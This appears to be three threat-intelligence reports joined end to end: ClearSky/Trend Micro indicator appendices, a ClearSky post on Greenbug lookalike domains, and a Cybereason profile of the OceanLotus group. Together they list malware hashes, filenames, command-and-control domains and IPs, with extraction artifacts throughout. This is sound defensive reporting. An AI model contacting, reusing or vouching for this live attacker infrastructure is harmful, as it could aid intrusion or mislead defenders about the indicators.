f1607a5b918345f89e3c2887c6dafc05c5832593
341c920ec47efa4fd1bfcd1859a7fb98945f9d85
8b702ba2b2bd65c3ad47117515f0669c
6ea02f1f13cc39d953e5a3ebcdcfd882
8f77a9cc2ad32af6fb1865fdff82ad89
62f8f45c5f10647af0040f965a3ea96d
d9aa197ca2f01a66df248c7a8b582c40
217b1c2760bcf4838f5e3efb980064d7
cfb4be91d8546203ae602c0284126408
16a711a8fa5a40ee787e41c2c65faf9a78b195307ac069c5e13ba18bce243d01
5e65373a7c6abca7e3f75ce74c6e8143
d3b9da7c8c54f7f1ea6433ac34b120a1
32261fe44c368724593fbf65d47fc826
d2c117d18cb05140373713859803a0d6
113ca319e85778b62145019359380a08
4999967c94a2fb1fa8122f1eea7a0e02
9846b07bf7265161573392d24543940e
bf23ce4ae7d5c774b1fa6becd6864b3b
720203904c9eaf45ff767425a8c518cd
62652f074924bb961d74099bc7b95731
1fba1876c88203a2ae6a59ce0b5da2a1
cf8502b8b67d11fbb0c75ebcf741db15
fb775e900872e01f65e606b722719594
73f14f320facbdd29ae6f0628fa6f198dc86ba3428b3eddbfc39cf36224cebb9
3d2885edf1f70ce4eb1e9519f47a669f
config.exe
Strike.doc
malware.doc
PDFOPENER_CONSOLE.exe
Ma_1.tmp
Wextract
The%20United%20Nations%20Counter.doc.docx
netsrvs.exe
Date.dotm
ssl.docx
Page 42 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
o040t.exe
m8f7s.exe
d5tjo.exe
LogManager.tmp
edg1CF5.tmp
ntuser.swp
svchost64.swp
ntuser.dat.swp
455aa96e-804g-4bcf-bcf8-f400b3a9cfe9.PackageExtraction
Svchost32.swp
Svchost64.swp
update5x.dll
22092014_ver621.dll
netsrv.exe
netsrva.exe
netsrvd.exe
netsrvs.exe
vminst.tmp
tdtess.exe
test_oracle.xls
ur96r.exe
The North Korean weapons program now testing USA range.docx
F123321.exe
wethearservice[.]com
mywindows24[.]in
microsoft-office[.]solutions
code[.]jguery[.]net
1m100[.]tech
cloudflare-statics[.]com
cachevideo[.]com
winfeedback[.]net
terendmicro[.]com
alkamaihd[.]com
msv-updates[.]gsvr-static[.]co
fbstatic-a[.]space
broadcast-microsoft[.]tech
sharepoint-microsoft[.]co
newsfeeds-microsoft[.]press
owa-microsoft[.]online
digicert[.]online
cloudflare-analyse[.]com
israelnewsagency[.]link
akamaitechnology[.]tech
winupdate64[.]org
ads-youtube[.]net
cortana-search[.]com
nsserver[.]host
nameserver[.]win
symcd[.]xyz
fdgdsg[.]xyz
dnsserv[.]host
winupdate64[.]com
ssl-gstatic[.]online
updatedrivers[.]org
Page 43 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
alkamaihd[.]net
update[.]microsoft-office[.]solutions
javaupdate[.]co
outlook360[.]org
winupdate64[.]net
trendmicro[.]tech
qoldenlines[.]net
windefender[.]org
1e100[.]tech
chromeupdates[.]online
ads-youtube[.]online
akamaitechnology[.]com
cloudmicrosoft[.]net
js[.]jguery[.]online
azurewebsites[.]tech
elasticbeanstalk[.]tech
jguery[.]online
microsoft-security[.]host
microsoft-ds[.]com
jguery[.]net
primeminister-goverment-techcenter[.]tech
officeapps-live[.]com
microsoft-tool[.]com
cissco[.]net
js[.]jguery[.]net
f-tqn[.]com
javaupdator[.]com
officeapps-live[.]net
ipresolver[.]org
intelchip[.]org
outlook360[.]net
windowkernel[.]com
wheatherserviceapi[.]info
windowslayer[.]in
sdlc-esd-oracle[.]online
mpmicrosoft[.]com
officeapps-live[.]org
cachevideo[.]online
win-update[.]com
labs-cloudfront[.]com
windowskernel14[.]com
fbstatic-akamaihd[.]com
mcafee-analyzer[.]com
cloud-analyzer[.]com
fb-statics[.]com
ynet[.]link
twiter-statics[.]info
diagnose[.]microsoft-office[.]solutions
mswordupdate17[.]com
gsvr-static[.]co
news-bbc[.]press
mandalasanati[.]info
office-msupdate[.]solutions
windows-updates[.]solutions
Page 44 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
Domain
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
akamai-net[.]network
azureedge-net[.]services
doucbleclick[.]tech
windows-updates[.]services
windows-updates[.]network
cloudfront[.]site
netcdn-cachefly[.]network
akamaized[.]online
cdninstagram[.]center
googlusercontent[.]center
ea-in-f354[.]1e100[.]ads-youtube[.]net
ns1[.]ynet[.]link
ns2[.]ynet[.]link
static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]akamai[.]be-5-0-ibr01-lts-ntwk-msn[.]alkamaihd[.]com
pht[.]is[.]nlb-deploy[.]edge-dyn[.]e11[.]f20[.]ads-youtube[.]online
ns1[.]winfeedback[.]net
ns2[.]winfeedback[.]net
msupdate[.]diagnose[.]microsoft-office[.]solutions
www[.]alkamaihd[.]net
c20[.]jdk[.]cdn-external-ie[.]1e100[.]alkamaihd[.]net
ns2[.]img[.]twiter-statics[.]info
api[.]img[.]twiter-statics[.]info
ns1[.]img[.]twiter-statics[.]info
ns1[.]officeapps-live[.]net
ns1[.]wheatherserviceapi[.]info
ns2[.]microsoft-tool[.]com
ns2[.]f-tqn[.]com
carl[.]ns[.]cloudflare[.]com[.]sdlc-esd-oracle[.]online
ns1[.]cortana-search[.]com
40[.]dc[.]c0ad[.]ip4[.]dyn[.]gsvr-static[.]co
40[.]dc[.]c2ad[.]ip4[.]dyn[.]gsvr-static[.]co
ns2[.]winupdate64[.]org
ns1[.]f-tqn[.]com
ns2[.]cortana-search[.]com
ns1[.]symcd[.]xyz
ns2[.]symcd[.]xyz
ns1[.]winupdate64[.]org
ns1[.]microsoft-tool[.]com
ns2[.]officeapps-live[.]com
ns1[.]israelnewsagency[.]link
ns2[.]israelnewsagency[.]link
ns1[.]cissco[.]net
ns2[.]cissco[.]net
ns1[.]cachevideo[.]online
ns2[.]cachevideo[.]online
www[.]static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]akamai[.]alkamaihd[.]com
static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]akamai[.]www[.]alkamaihd[.]com
dhb[.]stage[.]12735072[.]40[.]dc[.]c0ad[.]ip4[.]sta[.]gsvr-static[.]co
main[.]windowskernel14[.]com
www[.]winupdate64[.]net
ae13-0-hk2-96cbe-1a-ntwk-msn[.]static[.]dyn-usr[.]g-blcse[.]d45[.]a63[.]akamai[.]alkamaihd[.]com
be-5-0-ibr01-lts-ntwk-msn[.]static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]akamai[.]alkamaihd[.]com
Page 45 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]akamai[.]static[.]dyn-usr[.]g-blcse[.]d45[.]a63[.]akamai[.]alkamaihd[.]com
cyb[.]stage[.]12735072[.]40[.]dc[.]c0ad[.]ip4[.]sta[.]gsvr-static[.]co
ns1[.]winupdate64[.]com
ns1[.]twiter-statics[.]info
40[.]dc[.]c0ad[.]ip4[.]dyn[.]gsvr-static[.]co
update[.]microsoft-office[.]solutions
wk-in-f104[.]1e100[.]n[.]microsoft[.]qoldenlines[.]net
ns1[.]fb-statics[.]com
ns2[.]fb-statics[.]com
is-cdn[.]edge[.]g18[.]dyn[.]usr-e12-as[.]akamaitechnology
img[.]gmailtagmanager[.]com
wk-in-f104[.]1c100[.]n[.]microsoft-security[.]host
msnbot-sd7-46-cdn[.]microsoft-security[.]host
msnbot-sd7-46-img[.]microsoft-security[.]host
ns2[.]winupdate64[.]com
msnbot-sd7-46-194[.]microsoft-security[.]host
ea-in-f155[.]1e100[.]microsoft-security[.]host
msnbot-207-46-194[.]microsoft-security[.]host
img[.]twiter-statics[.]info
msnbot-sd7-46-cdn[.]microsoft-security[.]host
ns2[.]wheatherserviceapi[.]info
ns1[.]windowkernel[.]com
ns2[.]windowkernel[.]com
ns2[.]fbstatic-a[.]space
ns1[.]fbstatic-a[.]space
api[.]TwitEr-Statics[.]info
ns2[.]mcafee-analyzer[.]com
21666[.]mpmicrosoft[.]com
22830[.]officeapps-live[.]org
15236[.]mcafee-analyzer[.]com
ns2[.]static[.]dyn-usr[.]gsrv02[.]ssl-gstatic[.]online
ns1[.]mcafee-analyzer[.]com
ns1[.]fbstatic-akamaihd[.]com
ns1[.]static[.]dyn-usr[.]gsrv01[.]ssl-gstatic[.]online
ns2[.]officeapps-live[.]org
wk-in-f104[.]1e100[.]n[.]microsoft-security[.]host
ns1[.]mpmicrosoft[.]com
www[.]microsoft-security[.]host
ns2[.]fbstatic-akamaihd[.]com
ns1[.]cachevideo[.]online
wk-in-f100[.]1e100[.]n[.]microsoft-security[.]host
ns1[.]officeapps-live[.]org
ns2[.]mpmicrosoft[.]com
ns02[.]nsserver[.]host
ns2[.]cachevideo[.]online
be-5-0-ibr01-lts-ntwk-msn[.]alkamaihd[.]com
static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]akamai[.]alkamaihd[.]com
www[.]alkamaihd[.]com
ae13-0-hk2-96cbe-1a-ntwk-msn[.]alkamaihd[.]com
ns2[.]microsoft-ds[.]com
adcenter[.]microsoft-ds[.]com
ns1[.]microsoft-ds[.]com
ns1[.]mswordupdate17[.]com
Page 46 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
ns2[.]mswordupdate17[.]com
c[.]mswordupdate17[.]com
ns1[.]cloudflare-analyse[.]com
static[.]dyn-usr[.]f-loginme[.]c19[.]a23[.]akamaitechnology[.]com
ns2[.]cloudflare-analyse[.]com
ns1[.]cloud-analyzer[.]com
ns2[.]cloud-analyzer[.]com
ns01[.]nsserver[.]host
ns1[.]fb-statics[.]com
ns02[.]dnsserv[.]host
15236[.]cachevideo[.]online
ns2[.]fb-statics[.]com
ns2[.]twiter-statics[.]info
ea-in-f113[.]1e100[.]microsoft-security[.]host
static[.]dyn-usr[.]f-login-me[.]c19[.]a[.]akamaitechnology[.]tech
ea-in-f155[.]1e100[.]microsoft-security[.]host
float[.]2963[.]bm-imp[.]akamaitechnology[.]tech
ns1[.]mcafee-analyzer[.]com
ns2[.]mcafee-analyzer[.]com
ns1[.]mpmicrosoft[.]com
ns2[.]mpmicrosoft[.]com
jpsrv-java-jdkec1[.]javaupdate[.]co
microsoft-active[.]directory_update-change-policy[.]primeminister-goverment-techcenter[.]tech
jpsrv-java-jdkec3[.]javaupdate[.]co
nameserver02[.]javaupdate[.]co
jpsrv-java-jdkec2[.]javaupdate[.]co
static[.]dyn-usr[.]f-login-me[.]c19[.]a23[.]akamaitechnology[.]com
static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]alkamaihd[.]net
ssl[.]pmo[.]gov[.]il-dana-naauthurl1-welcome[.]cgi[.]primeminister-goverment-techcenter[.]tech
ns1[.]static[.]dyn-usr[.]gsrv01[.]ssl- gstatic[.]online
ns2[.]static[.]dyn-usr[.]gsrv02[.]ssl- gstatic[.]online
static[.]primeminister-goverment-techcenter[.]tech
ns1[.]outlook360[.]org
d45[.]a63[.]alkamaihd[.]net
ns1[.]officeapps-live[.]org
ns2[.]outlook360[.]org
ns2[.]officeapps-live[.]org
ns2[.]win-update[.]com
aaa[.]stage[.]14043411[.]email[.]sharepoint-microsoft[.]co
ns1[.]updatedrivers[.]org
a17-h16[.]g11[.]iad17[.]as[.]pht-external[.]c15[.]qoldenlines[.]net
ns1[.]windefender[.]org
is-cdn[.]edge[.]g18[.]dyn[.]usr-e12-as[.]akamaitechnology[.]com
ns2[.]windefender[.]org
ns1[.]win-update[.]com
ns2[.]updatedrivers[.]org
ns1[.]mpmicrosoft[.]com
ns1[.]officeapps-live[.]org
ns2[.]officeapps-live[.]org
ns2[.]ipresolver[.]org
ns1[.]ipresolver[.]org
www[.]is-cdn[.]edge[.]g18[.]dyn[.]usr-e12-as[.]akamaitechnology[.]com
11716[.]cachevideo[.]com
ns1[.]intelchip[.]org
Page 47 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
DNSName
ns2[.]cachevideo[.]com
7737[.]cloudflare-statics[.]com
7052[.]cloudflare-statics[.]com
7737[.]digicert[.]online
ns1[.]cloudflare-statics[.]com
24984[.]cachevideo[.]com
ns1[.]digicert[.]online
ns2[.]digicert[.]online
24984[.]digicert[.]online
ns1[.]fbstatic-akamaihd[.]com
ns2[.]fbstatic-akamaihd[.]com
ns1[.]javaupdator[.]com
ns2[.]outlook360[.]net
ns01[.]nameserver[.]win
ns2[.]javaupdator[.]com
ns2[.]intelchip[.]org
TATIC[.]DYN-USR[.]GSRV01[.]SSL-GSTATIC[.]ONLINe
STATIC[.]DYN-USR[.]GSRV01[.]SSL-GSTATIC[.]online
ns1[.]labs-cloudfront[.]com
ns2[.]labs-cloudfront[.]com
www[.]broadcast-microsoft[.]tech
www[.]newsfeeds-microsoft[.]press
www[.]owa-microsoft[.]online
static[.]c20[.]jdk[.]cdn-external-ie[.]1e100[.]tech
ns1[.]cloud-analyzer[.]com
ns2[.]cloud-analyzer[.]com
ns2[.]cloudflare-statics[.]com
ns1[.]cachevideo[.]com
ns1[.]outlook360[.]net
3012[.]digicert[.]online
24984[.]cloudflare-statics[.]com
7737[.]cachevideo[.]com
hda[.]stage[.]12735072[.]40[.]dc[.]c0ad[.]ip4[.]sta[.]gsvr-static[.]co
msdn[.]winupdate64[.]net
kja[.]stage[.]12735072[.]40[.]dc[.]c0ad[.]ip4[.]sta[.]gsvr-static[.]co
Page 48 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Iranian Threat Agent Greenbug Impersonates Israeli HighTech and Cyber Security Companies
clearskysec.com /greenbug/
Iranian Threat Agent Greenbug has been registering domains similar to those of Israeli High-Tech and Cyber
Security Companies.
On 15 October 2017 a sample of ISMdoor was submitted to VirusTotal from Iraq. The sample name
was WmiPrv.tmp (f5ef3b060fb476253f9a7638f82940d9) and it had the following PDB string:
C:\Users\Void\Desktop\v 10.0.194\x64\Release\swchost.pdb
Two domains were used for command and control:
thetareysecurityupdate[.]com
securepackupdater[.]com
By pivoting off the registration details and servers data of the two domains we discovered others registered by the
threat agent. Eight contain the name of Israeli high-tech and cyber security companies and one of a Saudi Arabian
testing & commissioning of major electrical equipment company.
We estimate that the domains were registered in order to be used when targeting these companies, organisations
related to them, or unrelated third parties. However, we do not have any indication that the companies were actually
targeted or otherwise impacted.
Below are the malicious domains and the companies who
s names were used.
Malicious Domain
Impersonated company
Registration
date
winsecupdater[.]com
11/6/2016
dnsupdater[.]com
12/4/2016
winscripts[.]net
3/4/2017
allsecpackupdater[.]com
Uncertain
lbolbo[.]com
4/8/2017
4/8/2017
securepackupdater[.]com
Uncertain
4/8/2017
thetaraysecurityupdate[.]com
ThetaRay (thetaray.com)
An Israeli cyber security and big data
analytics company
4/8/2017
ymaaz[.]com
YMAAZE (ymaaze.com)
A Saudi Arabian testing &
commissioning of major electrical equipment company
4/8/2017
oospoosp[.]com
8/9/2017
osposposp[.]com
8/9/2017
znazna[.]com
8/9/2017
mbsmbs[.]com
8/9/2017
outbrainsecupdater[.]com
Outbrain (outbrain.com)
A major Israeli online advertising
company
8/9/2017
securelogicupdater[.]com
SecureLogic (space-logic.com)
Likely an Israeli marketer of
airport security systems by the same name. Other companies with
the same name exist.
8/9/2017
benyaminsecupdater[.]com
Uncertain
8/9/2017
wixwixwix[.]com
Wix (wix.com)
A major Israeli cloud-based web development
platform
8/9/2017
biocatchsecurity[.]com
Biocatch (biocatch.com)
an Israeli company developing
technology for behavioral biometrics for fraud prevention and
detection
10/14/2017
corticasecurity[.]com
Cortica (cortica.com)
an Israeli company developing Artificial
Intelligence technology
10/14/2017
covertixsecurity[.]com
Covertix (covertix.com)
An Israeli data security company
10/14/2017
arbescurity[.]com
Arbe Robotics (arberobotics.com)
An Israeli company
developing autonomous driving technology
10/14/2017
Indicators of compromise
Indicators of compromise are presented below and are available on PassiveTotal.
Domain
allsecpackupdater[.]com
Domain
znazna[.]com
Domain
arbescurity[.]com
Domain
benyaminsecupdater[.]com
Domain
biocatchsecurity[.]com
Domain
corticasecurity[.]com
Domain
covertixsecurity[.]com
Domain
dnsupdater[.]com
Domain
lbolbo[.]com
Domain
mbsmbs[.]com
Domain
ntpupdateserver[.]com
Domain
oospoosp[.]com
Domain
osposposp[.]com
Domain
outbrainsecupdater[.]com
Domain
securelogicupdater[.]com
Domain
securepackupdater[.]com
Domain
thetaraysecurityupdate[.]com
Domain
winscripts[.]net
Domain
winsecupdater[.]com
Domain
wixwixwix[.]com
Domain
ymaaz[.]com
Domain
benyaminsecupdater[.]com
Filename
WmiPrv.tmp
Hash
37d586727c1293d8a278b69d3f0c5c4b
Hash
82755bf7ad786d7bf8da00b6c19b6091
Hash
ad5120454218bb483e0b8467feb3a20f
Hash
e0175eecf8d31a6f32da076d22ecbdff
Hash
f5ef3b060fb476253f9a7638f82940d9
151.80.113.150
151.80.221.23
217.182.244.254
46.105.130.98
5.39.31.91
80.82.66.164
SSLCertificate 3b0b85ea32cab82eaf4249c04c05bdfce5b6074ca076fedf87dbea6b28fab99d
The Maltego graph below depicts the relationship among the indicators (click to enlarge):
Update 2017-10-25
three hashes removed from IOC list
The following hashes were mistakenly included in the IOC list
and have been removed, as they are unrelated to the campaign:
c594b52ec8922a1e980a2ea31b1d1157
179cb8839e9ee8e9e6665b0986bf7811
d30c4df6de21275ae69a4754fc2372ef
Operation Cobalt Kitty
Threat Actor Profile &
Indicators of Compromise
By: Assaf Dahan
2016 Cybereason. All rights reserved.
Attribution
In this APT, the threat actor was very aware of the risks of exposure and tried to combat
attribution as much as possible. This is often the case in this type of large-scale cyber
espionage operations. At the time of the attack, there weren
t many classic indicators of
compromise (IOCs) that could lead to attribution. However, at the same time, the threat actors
behind Operation Cobalt Kitty left enough
behavioral fingerprints
to suspect the involvement of
the OceanLotus Group (which also goes by the names APT-C-00, SeaLotus and APT32),
which was first documented by Qihoo 360's SkyEye Labs in 2015 and further researched by
other security companies, including FireEye
s report. Reports of the group
s activity in Asia date
back to 2012, attacking Chinese entities. Over the years, the group was observed attacking a
wide spectrum of targets in other Asian countries (Philippines and Vietnam). Cybereason
concludes that the tactics, techniques and procedures (TTPs) observed throughout operation
Cobalt Kitty are consistent with the group
s previous APT campaigns in Asia.
The Lotus Group appears to have a tendency of using similar and even identical names for their
payloads (seen in their PowerShell payloads, Denis backdoor and fake Flash installers). In
addition, they also used similar anonymization services for their domains repeatedly. That type
small
details also played a role in attributing Operation Cobalt Kitty to the OceanLotus
Group.
Lastly, during the investigation, Cybereason noticed that some of the C&C domains and IPs
started to emerge on VirusTotal and other threat intelligence engines, with payloads that were
not observed during Cobalt Kitty. This was a cutting proof that Cobalt Kitty was not an isolated
APT, but part of something bigger. Example of the C&C domains and IPs used by the group
across different APT campaigns and caught in the wild:
*.chatconnecting(.)com
blog.versign(.)com
vieweva(.)com
tulationeva(.)com
teriava(.)com
tonholding(.)com
nsquery(.)net
notificeva(.)com
23.227.196(.)210
104.237.218(.)72
45.114.117(.)137
Some of these domains were also mentioned in FireEye
s APT32 report, further confirming our
suspicions that the group behind the attack is the OceanLotus Group.
The group includes members who are fluent in at least two Asian languages. This claim is
supported by the language used in the spear-phishing emails, which appear to be written by
native speakers. In addition, the language localization settings found in few of the payloads
suggest that the malware authors compiled the payloads on machines with Asian languages
2017 Cybereason Inc. All rights reserved.
support. The threat actors are not likely native English speakers since multiple typos were found
in their payloads.
For example, the following typo was observed in the file metadata of one of the backdoors.
Notice the
Internal Name
field (
Geogle Update
Threat Actor Profile
The attackers behind Operation Cobalt Kitty were extremely persistent. Even when their
campaign was exposed, the attackers did not give up. They took
pauses
that lasted between
48 hours and four weeks and used the downtime to learn from their
mistakes
and develop
workarounds before resuming the APT campaign.
The members of the OceanLotus Group demonstrated a remarkable ability to quickly adapt,
introduce new tools and fine tune existing ones to bypass security solutions and avoid detection.
The high number of payloads and the elaborate C2 infrastructure used in this attack can be
indicative of the resources that the attackers had at their disposal. Simultaneously orchestrating
multiple APT campaigns of such magnitude and sophistication takes time, financial resources
and a large team who can support it.
Threat actor
s main characteristics
Here are the main characteristics that can help profile the threat actor:
Motivation - Based on the nature of the attack, the proprietary information that the
attackers were after and the high-profile personnel who were targeted, Cybereason
concluded the main motivation behind the attack was cyber espionage. The attacker
sought after specific documents and type of information. This is consistent with previous
reports about the group
s activity show that the group has a very wide range of targets,
spanning from government agencies, media, business sector, and more.
2017 Cybereason Inc. All rights reserved.
Operational working hours - Most of the malicious activity was mostly done around
normal business hours (8AM-8PM). Very little active hacking activity was detected
during weekends. The attackers showed a slight tendency to carry out hacking
operations towards the afternoon and evening time. These observations can suggest the
following:
Time zone(s) proximity.
An institutionalized threat actor (possibly nation-state)
Outlook backdoor and data exfiltration - One of the most interesting tools introduced
by the attackers was the Outlook backdoor, which used Outlook as a C2 channel. This
backdoor has not been publicly documented and is one of the most unique TTPs with
regards to the threat actor. Outlook backdoors are not a new concept and have been
observed in different APTs in the past. However, this specific type of Outlook backdoor
is can be considered as one of the
signature tools
of the OceanLotus Group.
Publicly available tools - The attackers showed a clear preference to use publicly
available hacking tools and frameworks. Beyond being spared the hassle of creating a
new tool, it is much harder to attribute a tool that can be used by anyone rather than a
custom-made tool. However, the attackers should not be considered script-kiddies. Most
of the publicly available tools were either obfuscated, modified and even merged with
other tools to evade antivirus detection. This type of customization requires good coding
skills and understanding of how those tools work.
Cobalt Strike usage in APT - Cobalt Strike is a commercial offensive security
framework designed to simulate complex attacks and is mainly used by security
professionals in security audits and penetration testing. The OceanLotus Group was
previously documented using Cobalt Strike as one of its main tools. Other Large scale
APTs using Cobalt Strike have been reported before, such as APT-TOCS (could be
related to OceanLotus), Ordinaff, Carbanak Group, and the Cobalt Group.
Custom-built backdoors - The threat actor used very sophisticated and stealthy
backdoors (Denis & Goopy) that were written by highly skilled malware authors. During
the attack, the authors introduced new variants of these backdoors, indicating
on-thefly
development capabilities. Developing such state-of-the-art backdoors requires skillful
malware authors, time and resources. In addition, both the Denis and Goopy backdoors
used DNS Tunneling for C2 communication. The OceanLotus Group is known to have a
backdoor dubbed SOUNDBITE by FireEye that use this stealthy technique. However, no
public analysis reports of SOUNDBITE is available to the time of writing this report.
Exploiting DLL hijacking in trusted applications - The attackers exploited three DLLhijacking vulnerabilities in legitimate applications from trusted vendors: Microsoft,
Google and Kaspersky. This further indicates the group
s emphasis on vulnerability
research. DLL-hijacking / Side-loading attacks are not uncommon in APTs, some of
which are also carried out by nation-state actors and advanced cyber-crime groups.
2017 Cybereason Inc. All rights reserved.
There have been reports in the past of GoogleUpdate exploited by PlugX by Chinese
threat actors as well as the Bookworm RAT exploiting Microsoft and Kaspersky
applications in APTs targeting Asia.
Insisting on fileless operation - While fileless delivery infrastructure is not a feature
that can be attributed to one specific group, it is still worth mentioning since the attackers
went out of their way to restore the script-based PowerShell / Visual Basic operation,
especially after PowerShell execution had been disabled in the entire organization.
C&C infrastructure
Divide and conquer - Each tool communicated with different sets of C&C
servers domains, which usually came in triads. For instance, Cobalt strike
payloads communicated with certain sets of IPs/domains while the backdoors
communicated with different sets of IPs/domains.
Re-use of domains and IPs across campaigns - Quite a few domains and IPs
that were observed in Operation Cobalt Kitty were found in-the-wild, attacking
other targets. It
s rather peculiar why the threat actor re-used the same domains
and IPs. It could be assumed that the malware operators wanted to have
centralized C&C servers per tool or tools, where they could monitor all of their
campaigns from dedicated servers.
Anonymous DNS records - Most of the domains point to companies that
provide DNS data privacy and anonymization, such as PrivacyProtect and
PrivacyGuardian.
C&C server protection - Most of the C&C servers IP addresses are protected
by CloudFlare and SECURED SERVERS LLC.
OceanLotus Group activity in Asia
As part of the analysis of the domains and IPs that were used in this operation, Cybereason
found samples that were caught
in-the-wild
(that were not part of Operation Cobalt Kitty).
Analysis of those samples clearly indicates the involvement of the threat actor in Asia and
Vietnam in particular. Both Qihoo 360 and FireEye demonstrate in their reports that the threat
actor is involved in campaigns in different Asian countries, such as Vietnam, China, and the
Philippines.
Most of the samples caught in-the-wild seem to target Vietnamese speakers. Some of the
samples exhibit clear evidence of targeting Vietnamese entities. This conclusion is derived from
the file names and file contents that are written in Vietnamese, as shown in the examples below:
File Name:
n tho
y.doc
SHA-1: 38297392df481d2ecf00cc7f05ce3361bd575b04
Malicious Domain / IP: 193.169.245(.)137
2017 Cybereason Inc. All rights reserved.
File Name: ID2016.doc
SHA-1: bfb3ca77d95d4f34982509380f2f146f63aa41bc
Malicious Domain / IP: support.chatconnecting(.)com
File Name: Gi
i th
ng m
i 2016 - H
ng.doc (Translation:
New Claim Form 2016
SHA-1: A5bddb5b10d673cbfe9b16a062ac78c9aa75b61c
Malicious Domain / IP: blog.versign(.)info
2017 Cybereason Inc. All rights reserved.
Indicators of Compromise (IOCs)
Malicious files
Backdoors
File name
SHA-1 hash
Msfte.dll
------------Variant of
Backdoor.Win32.Denis
be6342fc2f33d8380e0ee5531592e9f676bb1f94
638b7b0536217c8923e856f4138d9caff7eb309d
dcbe007ac5684793ea34bf27fdaa2952c4e84d12
43b85c5387aafb91aea599782622eb9d0b5b151f
Goopdate.dll
----------------Goopy backdoor
9afe0ac621c00829f960d06c16a3e556cd0de249
973b1ca8661be6651114edf29b10b31db4e218f7
1c503a44ed9a28aad1fa3227dc1e0556bbe79919
2e29e61620f2b5c2fd31c4eb812c84e57f20214a
c7b190119cec8c96b7e36b7c2cc90773cffd81fd
185b7db0fec0236dff53e45b9c2a446e627b4c6a
ef0f9aaf16ab65e4518296c77ee54e1178787e21
product_info.dll
3cf4b44c9470fb5bd0c16996c4b2a338502a7517
[Backdoor exploiting DLL-hijacking
against Kaspersky Avpia]
VbaProject.OTM
320e25629327e0e8946f3ea7c2a747ebd37fe26f
[Outlook Macro]
sunjavascheduler.ps1
sndVolSSO.ps1
SCVHost.ps1
fhsvcs.ps1
Goztp.ps1
0d3a33cb848499a9404d099f8238a6a0e0a4b471
c219a1ac5b4fd6d20a61bb5fdf68f65bbd40b453
91e9465532ef967c93b1ef04b7a906aa533a370e
[PowerShell versions of the Denis
/ Goopy backdoors]
Cobalt Strike Beacons
2017 Cybereason Inc. All rights reserved.
File name
SHA-1 hash
dns.exe
cd675977bf235eac49db60f6572be0d4051b9c07
msfte.dll
2f8e5f81a8ca94ec36380272e36a22e326aa40a4
FVEAPI.dll
01197697e554021af1ce7e980a5950a5fcf88318
sunjavascheduler.ps1
syscheck.ps1
dns.ps1
activator.ps1
nvidia.db
7657769f767cd021438fcce96a6befaf3bb2ba2d
Ed074a1609616fdb56b40d3059ff4bebe729e436
D667701804CA05BB536B80337A33D0714EA28129
F45A41D30F9574C41FE0A27CB121A667295268B2
7F4C28639355B0B6244EADBC8943E373344B2E7E
Malicious Word Documents
***Some of the phishing emails and Word documents were very targeted and
personalized, therefore, they are not listed here for privacy reasons
File name
SHA-1 hash
CV.doc
Complaint letter.doc
License Agreement.doc
[redacted]
Loader scripts
File name
SHA-1 hash
syscheck.vbs
62749484f7a6b4142a2b5d54f589a950483dfcc9
SndVolSSO.txt
cb3a982e15ae382c0f6bdacc0fcecf3a9d4a068d
